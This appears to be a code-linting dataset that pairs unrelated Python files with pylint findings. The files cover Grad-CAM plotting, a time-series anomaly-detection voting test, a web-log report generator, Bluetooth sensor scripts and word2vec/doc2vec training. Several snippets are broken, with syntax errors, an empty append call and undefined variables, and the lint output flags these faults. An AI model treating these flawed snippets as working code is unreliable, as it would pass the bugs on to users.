67 x_proc = to_time_series_dataset(X[s, :, :])
68 return x_proc, x_raw
69
70
71 def _compute_gradients(tensor, var_list):
72 grads = tf.gradients(tensor, var_list)
73 return [grad if grad is not None else tf.zeros_like(var) for var, grad in zip(var_list, grads)]
74
75
76 def grad_cam(input_model, data, category_index, nb_classes, layer_name):
77 # Lambda function for getting target category loss
78 target_layer = lambda x: target_category_loss(x, category_index, nb_classes)
79 # Lambda layer for function
80 x = Lambda(target_layer, output_shape = target_category_loss_output_shape)(input_model.output)
81 # Add Lambda layer as output to model
82 model = Model(inputs=input_model.input, outputs=x)
83 #model.summary()
84 # Function for getting target category loss y^c
85 loss = K.sum(model.output)
86 # Get the layer with "layer_name" as name
87 conv_output = [l for l in model.layers if l.name == layer_name][0].output
88 # Define function to calculate gradients
89 grads = normalize(_compute_gradients(loss, [conv_output])[0])
90 gradient_function = K.function([model.input], [conv_output, grads])
91
92 # Calculate convolution layer output and gradients for datasample
93 output, grads_val = gradient_function([data])
94 output, grads_val = output[0, :], grads_val[0, :, :]
95
96 # Calculate the neuron importance weights as mean of gradients
97 weights = np.mean(grads_val, axis = 0)
98 # Calculate CAM by multiplying weights with the respective output
99 cam = np.zeros(output.shape[0:1], dtype = np.float32)
100 for i, w in enumerate(weights):
101 cam += w * output[:, i]
102 # Interpolate CAM to get it back to the original data resolution
103 f = interp1d(np.linspace(0, 1, cam.shape[0]), cam, kind="slinear")
104 cam = f(np.linspace(0,1,data.shape[1]))
105 # Apply ReLU function to only get positive values
106 cam[cam < 0] = 0
107
108 return cam
109
110
111 def plot_grad_cam(cam, raw_input, cmap, alpha, language='eng'):
112 fig, ax = plt.subplots(raw_input.shape[-1], 1, figsize=(15, 9), sharex=True)
113 # fig.suptitle('Gradient Class Activation Map for sample of class %d' %predicted_class)
114 if language == 'eng':
115 ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Velocity $\mathit{v}$ in m/s", r"Current $\mathit{I}$ in A"]
116 if language == 'ger':
117 ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Geschwindigkeit $\mathit{v}$ in m/s", r"Stromstärke $\mathit{I}$ in A"]
118 for i, a in enumerate(ax):
119 left, right = (-1, raw_input.shape[1] + 1)
120 range_input = raw_input[:, :, i].max() - raw_input[:, :, i].min()
121 down, up = (raw_input[:, :, i].min() - 0.1 * range_input, raw_input[:, :, i].max() + 0.1 * range_input)
122 a.set_xlim(left, right)
123 a.set_ylim(down, up)
124 a.set_ylabel(ax_ylabel[i])
125 im = a.imshow(cam.reshape(1, -1), extent=[left, right, down, up], aspect='auto', alpha=alpha, cmap=cmap)
126 a.plot(raw_input[0, :, i], linewidth=2, color='k')
127 fig.subplots_adjust(right=0.8)
128 cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
129 cbar = fig.colorbar(im, cax=cbar_ax)
130 if language == 'eng':
131 cbar_ax.set_ylabel('Activation', rotation=90, labelpad=15)
132 if language == 'ger':
133 cbar_ax.set_ylabel('Aktivierung', rotation=90, labelpad=15)
134 return ax
135
136 if __name__ == "__main__":
137
138 X, y = load_data('test')
139 nb_classes = np.unique(y).shape[0]
140 # Load model and datasample
141 preprocessed_input, raw_input = get_sample(X, y, label=1)
142 model = get_model('test')
143
144 # Get prediction
145 predictions = model.predict(preprocessed_input)
146 predicted_class = np.argmax(predictions)
147 print('Predicted class: ', predicted_class)
148
149 # Calculate Class Activation Map
150 cam = grad_cam(model, preprocessed_input, predicted_class, nb_classes, 'block2_conv1')
151 ax = plot_grad_cam(cam, raw_input, 'jet', 1)
152 plt.show()
153
| 19 - warning: redefined-builtin
20 - warning: redefined-outer-name
24 - warning: redefined-outer-name
39 - warning: redefined-outer-name
39 - warning: redefined-outer-name
55 - error: possibly-used-before-assignment
56 - error: used-before-assignment
56 - error: used-before-assignment
61 - warning: redefined-outer-name
61 - warning: redefined-outer-name
62 - error: no-member
76 - refactor: too-many-locals
76 - warning: redefined-outer-name
82 - warning: redefined-outer-name
99 - warning: redefined-outer-name
111 - refactor: too-many-locals
111 - warning: redefined-outer-name
111 - warning: redefined-outer-name
112 - warning: redefined-outer-name
124 - error: possibly-used-before-assignment
129 - warning: unused-variable
|
1 from alpaca import Alpaca
2 from utils import load_test, split_df, TimeSeriesResampler,confusion_matrix
3 import time
4 from sklearn.model_selection import train_test_split
5 from sklearn.utils import shuffle
6 from sklearn.pipeline import Pipeline
7 import numpy as np
8 import pandas as pd
9
10
11 if __name__ == '__main__':
12
13 X, y = load_test()
14 # Length of timeseries for resampler and cnn
15 sz = 230
16 # Number of channels for cnn
17 num_channels = X.shape[-1]
18 # Number of classes for cnn
19 num_classes = np.unique(y).shape[0]
20 classes = np.array(["0", "1", "2", "3", "4", "?"])
21
22 repetitions = 1
23
24 results = []
25 outliers = np.empty((0, 230*3+5))
26
27 for r in range(repetitions):
28 print("Repetition #",r)
29
30 X, y = shuffle(X, y, random_state=r)
31 # Turn y to numpy array
32 y = np.array(y)
33 # Split into train and test sets
34 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r)
35
36 for votingstr in ["democratic", "veto", "stacked_svc", "stacked_dtc"]:
37
38 if votingstr == 'stacked_svc':
39 meta = 'svc'
40 elif votingstr == 'stacked_dtc':
41 meta = 'dtc'
42
43 if votingstr == 'stacked_svc' or votingstr == 'stacked_dtc':
44 voting = 'stacked'
45 stacked = True
46 else:
47 stacked = False
48 voting = votingstr
49 meta = None
50
51 # Build pipeline from resampler and estimator
52 resampler = TimeSeriesResampler(sz=sz)
53 alpaca = Pipeline([('resampler', resampler),
54 ('classifier', Alpaca())])
55 alpaca.fit(X_train, y_train, classifier__stacked=stacked, classifier__n_clusters=100)
56 y_pred_bin, y_pred = alpaca.predict(X_test, voting=voting)
57
58 # Plot confusion matrix (Binary)
59 y_test_bin = np.copy(y_test)
60 y_test_bin[y_test_bin > 0] = 1
61
62 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel()
63
64 # Append overall error
65 results.append([votingstr, r, 'err', (fp+fn)/(tn+fp+fn+tp)])
66
67 # Append false negative rate
68 results.append([votingstr, r, 'fnr', fn/(fn+tp)])
69
70 # Append false positive rate
71 results.append([votingstr, r, 'fpr', fp/(fp+tn)])
72
73 # Save misclassified samples (with y_pred,y_pred_bin, y_true, and voting scheme)
74 idx = np.where(y_test_bin != y_pred_bin)
75 # Flattened curves
76 curves = X_test[idx].transpose(0, 2, 1).reshape(X_test[idx].shape[0],-1)
77 vote_type = np.array([votingstr for i in range(idx[0].shape[0])]).reshape((-1,1))
78 wrong = np.hstack([curves, y_pred[idx].reshape((-1,1)),y_test[idx].reshape((-1,1)),
79 y_pred_bin[idx].reshape((-1,1)),y_test_bin[idx].reshape((-1,1)), vote_type])
80 outliers = np.vstack((outliers,wrong))
81
82
83 df = pd.DataFrame(outliers)
84 df.to_csv("..\\results\\OutliersVotingTest.csv")
85
86 df = pd.DataFrame(results, columns=['voting', 'test', 'metric', 'value'])
87 df.to_csv("..\\results\\VotingTest.csv")
88
89
| 43 - refactor: consider-using-in
2 - warning: unused-import
3 - warning: unused-import
|
1 import numpy as np
2 import pandas as pd
3 from utils import split_df, TimeSeriesResampler, plot_confusion_matrix, Differentiator
4 from alpaca import Alpaca
5 from sklearn.model_selection import train_test_split
6 from sklearn.pipeline import Pipeline
7 import matplotlib.pyplot as plt
8
9 if __name__ == "__main__":
10
11 """
12 IMPORT YOUR DATA HERE
13 X, y =
14 DEFINE RESAMPLING LENGTH IF NEEDED
15 sz =
16 """
17
18 # Turn y to numpy array
19 y = np.array(y)
20 # Split into train and test sets
21 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42)
22
23 # Pipeline example
24 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),('alpaca', Alpaca())])
25 alpaca.fit(X_train, y_train)
26
27 """
28 # Example with additional channel derived from channel 0
29 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),
30 ('differentiator',Differentiator(channel=0)),
31 ('alpaca', Alpaca())])
32 """
33
34 y_pred_bin_veto, y_pred_veto = alpaca.predict(X_test, voting="veto")
35 y_pred_bin_dem, y_pred_dem = alpaca.predict(X_test, voting="democratic")
36 y_pred_bin_meta_dtc, y_pred_meta_dtc = alpaca.predict(X_test, voting="meta_dtc")
37 y_pred_bin_meta_svc, y_pred_meta_svc = alpaca.predict(X_test, voting="meta_svc")
38
39 # Store all results in a dataframe
40 y_pred_indiv = np.column_stack((y_pred_bin_veto, y_pred_veto,y_pred_bin_dem, y_pred_dem, y_pred_bin_meta_dtc,
41 y_pred_meta_dtc, y_pred_bin_meta_svc, y_pred_meta_svc, y_test)).astype(int)
42 df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_bin_veto', 'y_pred_veto','y_pred_bin_dem',
43 'y_pred_dem', 'y_pred_bin_meta_dtc','y_pred_meta_dtc',
44 'y_pred_bin_meta_svc', 'y_pred_meta_svc', 'y_true'])
45 df_results.to_csv("results\\y_pred_total.csv",index=False)
46 print("TEST FINISHED SUCCESSFULLY")
47
| 11 - warning: pointless-string-statement
19 - error: used-before-assignment
21 - error: undefined-variable
24 - error: undefined-variable
27 - warning: pointless-string-statement
3 - warning: unused-import
3 - warning: unused-import
3 - warning: unused-import
7 - warning: unused-import
|
1 # -*- coding:utf-8 -*-
2 import configparser
3
4
5 class Config:
6 """get config from the ini file"""
7
8 def __init__(self, config_file):
9 all_config = configparser.RawConfigParser()
10 with open(config_file, 'r',encoding="UTF-8") as cfg_file:
11 all_config.readfp(cfg_file)
12
13 self.log_format = all_config.get('format', 'log-format')
14 self.log_pattern = all_config.get('format', 'log-pattern')
15
16 self.support_method = all_config.get('filter', 'support_method').split(',')
17 self.is_with_parameters = int(all_config.get('filter', 'is_with_parameters'))
18 self.always_parameter_keys = all_config.get('filter', 'always_parameter_keys').split(',')
19 self.urls_most_number = int(all_config.get('filter', 'urls_most_number'))
20 self.urls_pv_threshold = int(all_config.get('filter', 'urls_pv_threshold'))
21 self.urls_pv_threshold_time = int(all_config.get('filter', 'urls_pv_threshold_time'))
22 self.urls_pv_threshold_min = int(all_config.get('filter', 'urls_pv_threshold_min'))
23
24 self.ignore_url_suffix = all_config.get('filter', 'ignore_url_suffix').split(',')
25
26 self.fixed_parameter_keys = all_config.get('filter', 'fixed_parameter_keys').split(',')
27 self.custom_parameters_list = all_config.get('filter', 'custom_parameters').split(',')
28 self.custom_keys = []
29 self.custom_parameters = {}
30 for item in self.custom_parameters_list:
31 key = item.split('=')[0]
32 if len(item.split('=')) == 2:
33 value = item.split('=')[1]
34 else:
35 value = ''
36 self.custom_parameters.setdefault(key, value)
37 self.custom_keys.append(key)
38 self.ignore_urls = all_config.get('filter', 'ignore_urls').split(',')
39 self.static_file = all_config.get('filter', 'static-file').split(',')
40
41 self.second_line_flag = int(all_config.get('report', 'second_line_flag'))
42 self.cost_time_flag = int(all_config.get('report', 'cost_time_flag'))
43 self.cost_time_percentile_flag = int(all_config.get('report', 'cost_time_percentile_flag'))
44 self.cost_time_threshold = all_config.get('report', 'cost_time_threshold')
45 self.upload_flag = int(all_config.get('report', 'upload_flag'))
46 self.upload_url = all_config.get('report', 'upload_url')
47
48 self.goaccess_flag = int(all_config.get('goaccess', 'goaccess_flag'))
49 self.time_format = all_config.get('goaccess', 'time-format')
50 self.date_format = all_config.get('goaccess', 'date-format')
51 self.goaccess_log_format = all_config.get('goaccess', 'goaccess-log-format')
52
53 config = Config('../conf/config.ini')
| 5 - refactor: too-many-instance-attributes
11 - warning: deprecated-method
5 - refactor: too-few-public-methods
|
1 # -*- coding:utf-8 -*-
2 import json
3 import requests
4
5 from util import get_dir_files
6 from config import config
7 from jinja2 import Environment, FileSystemLoader
8
9 env = Environment(loader=FileSystemLoader('./templates'))
10 report_template = env.get_template('report.html')
11 index_template = env.get_template('index.html')
12 url_template = env.get_template('url.html')
13
14
15 def upload_report(data, hours_times, minutes_times):
16 target_file = data['source_file']
17 pv = data['pv']
18 uv = data['uv']
19 get_count = data['method_counts']['get']
20 get_percent = data['method_counts']['get_percentile']
21 post_count = data['method_counts']['post']
22 post_percent = data['method_counts']['post_percentile']
23 response_peak = data['response_peak']
24 response_peak_time = data['response_peak_time']
25 response_avg = data['response_avg']
26 hours_times = hours_times
27 hours_pv = data['hours_hits']
28 hours_most_common = data['hours_hits'].most_common(1)[0]
29 hours_pv_peak = hours_most_common[1]
30 hours_pv_peak_time = hours_most_common[0]
31 minute_times = minutes_times
32 minute_pv = data['minutes_hits']
33 minute_most_common = data['minutes_hits'].most_common(1)[0]
34 minute_pv_peak = minute_most_common[1]
35 minute_pv_peak_time = minute_most_common[0]
36 cost_percent = data['cost_time_range_percentile']
37 cost_time_threshold = data['cost_time_threshold']
38 cost_range = data['cost_time_range']
39 url_data_list = []
40
41 for url_data in data['url_data_list']:
42 url_data_list.append(url_data.get_data())
43
44 data = {'target_file': target_file, 'pv': pv, 'uv': uv,
45 'get_count': get_count, 'get_percent': get_percent,
46 'post_count': post_count, 'post_percent': post_percent,
47 'response_peak': response_peak, 'response_peak_time': response_peak_time,
48 'response_avg': response_avg,
49 'hours_times': hours_times,
50 'hours_pv': hours_pv,
51 'hours_pv_peak': hours_pv_peak,
52 'hours_pv_peak_time': hours_pv_peak_time,
53 'minute_times': minute_times,
54 'minute_pv': minute_pv,
55 'minute_pv_peak': minute_pv_peak,
56 'minute_pv_peak_time': minute_pv_peak_time,
57 'cost_percent': cost_percent,
58 'cost_percent_range': ['<50ms', '50~100ms', '100~150ms', '150~200ms', '200~250ms', '250~300ms',
59 '300~350ms', '350~400ms', '400~450ms', '450~500ms', '>500ms'],
60 'cost_time_threshold': cost_time_threshold,
61 'url_data_list': url_data_list,
62 'cost_range': cost_range,
63 'status_codes': data['status_codes']}
64 headers = {'Content-Type': 'application/json'}
65 r = requests.post(config.upload_url, data=json.dumps(data), headers=headers)
66 print(r.text)
67
68
69 def generate_web_log_parser_report(data):
70 if config.goaccess_flag:
71 data.setdefault('goaccess_file', data.get('source_file') + '_GoAccess.html')
72 data.setdefault('goaccess_title', u'查看GoAccess生成报告')
73 else:
74 data.setdefault('goaccess_file', '#')
75 data.setdefault('goaccess_title', u'GoAccess报告已设置为无效,无法查看')
76
77 hours_times = sorted(list(data.get('hours_hits')))
78 minutes_times = sorted(list(data.get('minutes_hits')))
79 seconds_times = sorted(list(data.get('second_hits')))
80
81 if config.upload_flag:
82 upload_report(data, hours_times, minutes_times)
83
84 html = report_template.render(data=data,
85 web_log_urls_file=data.get('source_file') + '_urls.html',
86 second_line_flag=config.second_line_flag,
87 hours_times=hours_times,
88 minutes_times=minutes_times,
89 seconds_times=seconds_times,
90 method_counts=data.get('method_counts'),
91 cost_time_range_percentile=data.get('cost_time_range_percentile'),
92 cost_time_list=data.get('cost_time_list'),
93 cost_time_flag=data.get('cost_time_flag'),
94 cost_time_percentile_flag=data.get('cost_time_percentile_flag'),
95 cost_time_threshold=data.get('cost_time_threshold'),
96 cost_time_range=data.get('cost_time_range'),
97 status_codes=data.get('status_codes'),
98 status_codes_keys=data.get('status_codes').keys())
99
100 html_file = '../result/report/' + data.get('source_file') + '.html'
101 with open(html_file, 'wb') as f:
102 f.write((html.encode('utf-8')))
103
104
105 def generate_web_log_parser_urls(data):
106 html = url_template.render(data=data,
107 url_datas=sorted(data.get('urls')))
108
109 html_file = '../result/urls/' + data.get('source_file') + '_urls.html'
110 with open(html_file, 'wb') as f:
111 f.write((html.encode('utf-8')))
112
113
114 def update_index_html():
115 html = index_template.render(files=sorted(get_dir_files('../result/report/')))
116
117 with open('../result/index.html', 'wb') as f:
118 f.write((html.encode('utf-8')))
| 15 - refactor: too-many-locals
26 - warning: self-assigning-variable
65 - warning: missing-timeout
72 - warning: redundant-u-string-prefix
75 - warning: redundant-u-string-prefix
|
1 ##Main
2
3 from bluepy import btle
4 from bluepy.btle import Peripheral, DefaultDelegate
5 import os.path
6 import struct
7 import binascii
8 import sys
9 import datetime
10 import time
11 from time import time,sleep
12 import Services
13 from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate
14 import Device
15 from Device import Device
16 from urllib.request import urlopen
17
18
19 ##Mac 1: FD:88:50:58:E7:45
20 ##Mac 2: E4:F6:C5:F7:03:39
21
22 ## MAC address Device device
23 global MAC
24
25
26 if __name__ == "__main__":
27 MAC = str(sys.argv[1])
28
29
30
31 print("Connecting to " + MAC)
32 Device1 = Device(MAC)
33 print("Connected...")
34 print("Bonding...")
35 Device1.setSecurityLevel("medium")
36 print("Bonded...")
37
38
39 print("Enabling Services...")
40 Device1.battery.enable()
41 #~ Device1.ui.enable()
42 Device1.motion.enable()
43
44
45
46 Device1.setDelegate(DeviceDelegate())
47
48 print('Services Enabled...')
49
50 print('Battery Level(1): ', Device1.battery.b_read(), '%')
51
52
53
54
55 #~ Device1.ui.set_led_mode_breathe(0x02, 50, 1000)
56 ##Battery sensor
57 #~ Device1.battery.set_battery_notification(True)
58
59 ##UI service
60 #~ Device1.ui.set_button_notification(True)
61
62 ##Motion Services
63 Device1.motion.configure(motion_freq=5)
64 #~ Device1.motion.set_tap_notification(True)
65 #~ Device1.motion.set_orient_notification(True)
66 #~ Device1.motion.set_quaternion_notification(True)
67 #~ Device1.motion.set_stepcount_notification(True)
68 #~ Device1.motion.set_rawdata_notification(True)
69 Device1.motion.set_euler_notification(True)
70 #~ Device1.motion.set_rotation_notification(True)
71 #~ Device1.motion.set_heading_notification(True)
72 #~ Device1.motion.set_gravity_notification(True)
73
74
75
76
77
78
79 try:
80 while True:
81 if Device1.waitForNotifications(180.0) :
82 # handleNotification() was called
83 continue
84 print("Waiting...")
85
86
87
88 except KeyboardInterrupt:
89 print("Disabling Notifications and Indications...")
90 Device1.battery.disable()
91 Device1.ui.disable()
92 Device1.motion.disable()
93 print("Notifications and Indications Disabled...")
94 print("Device Session Finished...")
| 23 - warning: global-at-module-level
3 - warning: unused-import
4 - warning: unused-import
4 - warning: unused-import
5 - warning: unused-import
6 - warning: unused-import
7 - warning: unused-import
9 - warning: unused-import
10 - warning: unused-import
11 - warning: unused-import
12 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
13 - warning: unused-import
16 - warning: unused-import
|
1 #####################################################################
2 # BLE devices handler #
3 # A new subprocess is created for each preregistered device in: #
4 # ./devices.mac #
5 #####################################################################
6
7 import subprocess
8 import time
9
10 #~ mac_file = open('devices.mac', 'r')
11
12 #~ for mac_address in mac_file:
13 #~ subprocess.call(['gnome-terminal', '-e', 'python3 main.py ' + mac_address])
14 #~ time.sleep(10)
15
16 subprocess.call(['gnome-terminal', '-e', 'python3 main.py FD:88:50:58:E7:45' ])
17 time.sleep(20)
18 subprocess.call(['gnome-terminal', '-e', 'python3 mainMotion.py E4:F6:C5:F7:03:39' ])
| Clean Code: No Issues Detected
|
1
2
3 from bluepy import btle
4 from bluepy.btle import Peripheral, DefaultDelegate
5 import Services
6 from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate
7
8
9 ## Thingy52 Definition
10
11 class Device(Peripheral):
12 ##Thingy:52 module. Instance the class and enable to get access to the Thingy:52 Sensors.
13 #The addr of your device has to be know, or can be found by using the hcitool command line
14 #tool, for example. Call "> sudo hcitool lescan" and your Thingy's address should show up.
15
16 def __init__(self, addr):
17 Peripheral.__init__(self, addr, addrType="random")
18
19 #Thingy configuration service not implemented
20 self.battery = BatterySensor(self)
21 self.environment = EnvironmentService(self)
22 self.ui = UserInterfaceService(self)
23 self.motion = MotionService(self)
24 #self.sound = SoundService(self)
25
26
27
28
29
30
| 11 - refactor: too-few-public-methods
3 - warning: unused-import
4 - warning: unused-import
5 - warning: unused-import
6 - warning: unused-import
|
1 # coding=utf-8
2 import codecs
3 import re
4 from abstract import Abstract
5
6 __author__ = 'rcastro'
7
8 from gensim.models import Word2Vec
9 from codecs import open
10 import nltk
11 #nltk.download() # Download text data sets, including stop words
12 from nltk.corpus import stopwords # Import the stop word list
13 import numpy as np
14
15 #model = Word2Vec.load_word2vec_format("/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin", binary=True)
16 #print(model.most_similar('Crayfish', topn=5))
17
18 print ("get the abstracts")
19 text = ''
20 try:
21 with codecs.open('/Users/rcastro/dev/abstracts.txt', 'r', encoding='utf8') as abstracts_file:
22 text = abstracts_file.read().strip()
23 except IOError as e:
24 print ('Operation failed: %s' % e.strerror)
25
26 abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
27 num_reviews = len(abstracts)
28 clean_train_reviews = [x.text for x in abstracts]
29
30 def remove_numeric_tokens(string):
31 return re.sub(r'\d+[^\w|-]+', ' ', string)
32
33 vectorizer = TfidfVectorizer(analyzer="word",
34 tokenizer=None,
35 preprocessor=remove_numeric_tokens,
36 stop_words='english',
37 lowercase=True,
38 ngram_range=(1, 2),
39 min_df=1,
40 max_df=1, # quizas probar con 0.8 x ahi
41 token_pattern=r"(?u)\b[\w][\w|-]+\b",
42 max_features=155000)
43 analyzer = vectorizer.build_analyzer()
44
45 review_lists = [analyzer(w) for w in clean_train_reviews]
46
47
48
49 # Download the punkt tokenizer for sentence splitting
50 import nltk.data
51 # Load the punkt tokenizer
52 tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
53
54
55 # Define a function to split a review into parsed sentences
56 def review_to_sentences( review, tokenizer, remove_stopwords=True ):
57 # Function to split a review into parsed sentences. Returns a
58 # list of sentences, where each sentence is a list of words
59 #
60 # 1. Use the NLTK tokenizer to split the paragraph into sentences
61 raw_sentences = tokenizer.tokenize(review.strip())
62 #
63 # 2. Loop over each sentence
64 sentences = []
65 for raw_sentence in raw_sentences:
66 # If a sentence is empty, skip it
67 if len(raw_sentence) > 0:
68 # Otherwise, call review_to_wordlist to get a list of words
69 sentences.append( )
70 #
71 # Return the list of sentences (each sentence is a list of words,
72 # so this returns a list of lists
73 return sentences
74
75 sentences = [] # Initialize an empty list of sentences
76
77 print "Parsing sentences from training set"
78 for review in clean_train_reviews:
79 sentences += review_to_sentences(review, tokenizer)
80
81
82 # Import the built-in logging module and configure it so that Word2Vec
83 # creates nice output messages
84 import logging
85 logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
86 level=logging.INFO)
87
88 # Set values for various parameters
89 num_features = 400 # Word vector dimensionality
90 min_word_count = 1 # Minimum word count
91 num_workers = 4 # Number of threads to run in parallel
92 context = 20 # Context window size
93 downsampling = 1e-3 # Downsample setting for frequent words
94
95 # Initialize and train the model (this will take some time)
96 from gensim.models import word2vec
97 print "Training model..."
98
99 # bigram_transformer = gensim.models.Phrases(sentences)
100 # >>> model = Word2Vec(bigram_transformer[sentences], size=100, ...)
101
102 model = word2vec.Word2Vec(sentences, workers=num_workers,
103 size=num_features, min_count = min_word_count,
104 window = context, sample = downsampling, batch_words = 1000)
105
106 # If you don't plan to train the model any further, calling
107 # init_sims will make the model much more memory-efficient.
108 model.init_sims(replace=True)
109
110 # It can be helpful to create a meaningful model name and
111 # save the model for later use. You can load it later using Word2Vec.load()
112 model_name = "400features_2minwords_20context"
113 model.save(model_name)
114
115 print model.doesnt_match("man woman child kitchen".split())
116 print model.doesnt_match("france england germany berlin".split())
117 print model.most_similar("prawn", topn=10) | 77 - error: syntax-error
|
1 # coding=utf-8
2 import os
3 import re
4 import numpy as np
5 from abstract import Abstract
6
7 __author__ = 'rcastro'
8
9 from gensim.models import Doc2Vec
10 from gensim.models.doc2vec import TaggedLineDocument, TaggedDocument
11 from codecs import open
12
13
14 def remove_numeric_tokens(string):
15 return re.sub(r'\d+[^\w|-]+', ' ', string)
16
17
18 # Convert text to lower-case and strip punctuation/symbols from words
19 def normalize_text(text):
20 norm_text = text.lower()
21 # control_chars = [chr(0x85)]
22 # for c in control_chars:
23 # norm_text = norm_text.replace(c, ' ') # Replace breaks with spaces
24 # norm_text = norm_text.replace('<br />', ' ')
25
26 # Pad punctuation with spaces on both sides
27 for char in ['.', '"', ',', '!', '?', ';', ':']:
28 norm_text = norm_text.replace(char, ' ' + char + ' ')
29
30 return norm_text
31
32
33 sentences_keywords = []
34 docs_filename = 'abstracts_preprocesados.txt'
35 if not os.path.isfile(docs_filename):
36 print "get the abstracts"
37 text = ''
38 try:
39 with open('abstracts.txt', 'r', encoding='utf8') as abstracts_file:
40 text = abstracts_file.read().strip()
41 except IOError as e:
42 print 'no pudo leer los abstracts: %s' % e.strerror
43
44 abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
45 for article in abstracts:
46 sentences_keywords.append([normalize_text(remove_numeric_tokens(x)).strip() for x in article.keywords])
47 with open(docs_filename, 'w', encoding='utf8') as f:
48 for idx, line in enumerate([normalize_text(remove_numeric_tokens(x.text)) for x in abstracts]):
49 f.write(line + '\n')
50 # # num_line = "_*{0} {1}\n".format(idx, line)
51 # # f.write(line+'\n')
52
53 sentences = TaggedLineDocument('abstracts_preprocesados.txt')
54 # sentences = sentences_keywords
55
56
57 # Vamos a utilizar Doc2vec, ver http://rare-technologies.com/doc2vec-tutorial/
58
59 from gensim.models import Doc2Vec
60 import gensim.models.doc2vec
61 from collections import OrderedDict
62 import multiprocessing
63
64 cores = multiprocessing.cpu_count()
65 assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise"
66
67 # Set values for various parameters
68 num_features = 400 # Word vector dimensionality
69 # min_word_count = 1 # Minimum word count
70 # context = 20 # Context window size
71 # downsampling = 1e-3 # Downsample setting for frequent words
72
73 # 3 modelos diferentes con veectores de 50 variables
74 simple_models = [
75 # PV-DM w/concatenation - window=10 (both sides) approximates paper's 10-word total window size
76 Doc2Vec(dm=1, dm_concat=1, size=50, window=10, negative=10, hs=0, min_count=2, workers=cores),
77 # PV-DBOW
78 Doc2Vec(dm=0, size=50, negative=5, hs=0, min_count=2, workers=cores),
79 # PV-DM w/average
80 Doc2Vec(dm=1, dm_mean=1, size=50, window=10, negative=5, hs=0, min_count=2, workers=cores),
81 ]
82
83 # 3 modelos diferentes con veectores de 400 variables
84 simple_models_400 = [
85 # PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size
86 Doc2Vec(dm=1, dm_concat=1, size=num_features, window=10, negative=10, hs=0, min_count=2, workers=cores),
87 # PV-DBOW
88 Doc2Vec(dm=0, size=num_features, negative=5, hs=0, min_count=2, workers=cores),
89 # PV-DM w/average
90 Doc2Vec(dm=1, dm_mean=1, size=num_features, window=10, negative=5, hs=0, min_count=2, workers=cores),
91 ]
92
93 # speed setup by sharing results of 1st model's vocabulary scan
94 simple_models[0].build_vocab(sentences) # PV-DM/concat requires one special NULL word so it serves as template
95 print(simple_models[0])
96 for model in simple_models[1:]:
97 model.reset_from(simple_models[0])
98 print(model)
99
100
101 for model in simple_models_400:
102 model.reset_from(simple_models[0])
103 print(model)
104
105 all_models = simple_models+simple_models_400
106 models_by_name = OrderedDict((str(model), model) for model in all_models)
107
108 '''
109 Following the paper, we also evaluate models in pairs. These wrappers return the concatenation of the vectors from each model. (Only the singular models are trained.)
110 In [5]:
111 from gensim.test.test_doc2vec import ConcatenatedDoc2Vec
112 models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]])
113 models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]])
114 '''
115
116 from random import shuffle
117 import datetime
118
119 # for timing
120 from contextlib import contextmanager
121 from timeit import default_timer
122 import random
123
124 @contextmanager
125 def elapsed_timer():
126 start = default_timer()
127 elapser = lambda: default_timer() - start
128 yield lambda: elapser()
129 end = default_timer()
130 elapser = lambda: end-start
131
132 passes = 20
133 print("START %s" % datetime.datetime.now())
134
135 all_docs = []
136 for doc in sentences:
137 all_docs.append(doc)
138 for epoch in range(passes):
139 shuffle(all_docs) # shuffling gets best results
140
141 # doc_id = np.random.randint(len(sentences)) #
142 doc_id = np.random.randint(simple_models[0].docvecs.count) # pick random doc, (escoge un abstract aleatorio y busca los mas simijantes)
143
144 for name, model in models_by_name.items()[:3]:
145 with elapsed_timer() as elapsed:
146 model.train(all_docs)
147 # duration = '%.1f' % elapsed()
148 # print (name, duration)
149 sims = model.docvecs.most_similar(doc_id, topn=model.docvecs.count) # get *all* similar documents
150 print(u'ABSTRACTS mas similares por modelo %s:\n' % model)
151 print(u'abstract escogido: «%s»\n' % (' '.join(all_docs[doc_id].words)))
152 print(u'y sus keywords: «%s»\n' % (' '.join(sentences_keywords[doc_id])))
153 for label, index in [('MOST', 0)]: #, ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]:
154 print(u'%s %s: «%s»\n' % (label, sims[index][1], ' '.join(all_docs[sims[index][0]].words)))
155 print(u'Keywords de los docs similares: «%s»\n' % (' '.join(sentences_keywords[sims[index][0]])))
156
157
158 word_models = all_models[:3]
159 # while True:
160 # word = random.choice(word_models[0].index2word)
161 # if word_models[0].vocab[word].count > 10 and len(word)>3:
162 # break
163
164 # aqui puedes sustituir por una palabra, y ver que palabras similares te salen de acuerdo a los modelos...
165 word = "aquaculture" #diadromous
166 similars_per_model = [str(model.most_similar(word, topn=5)).replace('), ','),<br>\n') for model in word_models]
167 similar_table = ("<table><tr><th>" +
168 "</th><th>".join([str(model) for model in word_models]) +
169 "</th></tr><tr><td>" +
170 "</td><td>".join(similars_per_model) +
171 "</td></tr></table>")
172 print("most similar words for '%s' (%d occurences)" % (word, simple_models[0].vocab[word].count))
173 print(similar_table)
174
175 #TODO import wiki model and add to word_models
| 36 - error: syntax-error
|
1
2 import time
3 import numpy as np
4 import pandas as pd
5 import torch
6 import torch.utils.data as utils
7
8 from pytorch_gsp.utils.gsp import complement
9
10
